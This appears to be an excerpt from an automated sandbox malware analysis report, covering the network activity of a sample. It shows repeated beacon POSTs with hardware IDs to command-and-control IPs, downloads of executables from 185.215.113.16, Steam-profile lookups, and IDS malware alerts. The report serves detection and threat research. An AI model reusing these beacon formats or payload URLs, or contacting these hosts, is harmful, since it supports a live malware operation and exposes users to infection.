Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDAKFIJJKJJJKEBKJEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 35 43 37 39 45 34 46 33 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 2d 2d 0d 0a Data Ascii: ------FHIDAKFIJJKJJJKEBKJEContent-Disposition: form-data; name="hwid"A55C79E4F37B1953448019------FHIDAKFIJJKJJJKEBKJEContent-Disposition: form-data; name="build"doma------FHIDAKFIJJKJJJKEBKJE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 32 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001229001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHDGDHJEGHIDGDHCGCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 35 43 37 39 45 34 46 33 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="hwid"A55C79E4F37B1953448019------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="build"doma------HIDHDGDHJEGHIDGDHCGC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDHJECFCFCAKFHCFIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 44 48 4a 45 43 46 43 46 43 41 4b 46 48 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 35 43 37 39 45 34 46 33 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 48 4a 45 43 46 43 46 43 41 4b 46 48 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 48 4a 45 43 46 43 46 43 41 4b 46 48 43 46 49 44 2d 2d 0d 0a Data Ascii: ------EBGDHJECFCFCAKFHCFIDContent-Disposition: form-data; name="hwid"A55C79E4F37B1953448019------EBGDHJECFCFCAKFHCFIDContent-Disposition: form-data; name="build"doma------EBGDHJECFCFCAKFHCFID--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEGHDAECBFHJKEGIJKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 35 43 37 39 45 34 46 33 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------JJJEGHDAECBFHJKEGIJKContent-Disposition: form-data; name="hwid"A55C79E4F37B1953448019------JJJEGHDAECBFHJKEGIJKContent-Disposition: form-data; name="build"doma------JJJEGHDAECBFHJKEGIJK--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBGDHIIDAEBFHJJDBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 35 43 37 39 45 34 46 33 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 2d 2d 0d 0a Data Ascii: ------JJDBGDHIIDAEBFHJJDBFContent-Disposition: form-data; name="hwid"A55C79E4F37B1953448019------JJDBGDHIIDAEBFHJJDBFContent-Disposition: form-data; name="build"doma------JJDBGDHIIDAEBFHJJDBF--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 34.117.188.166 34.117.188.166
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49744 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49994 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49997 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50001 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50007 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50007 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50053 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
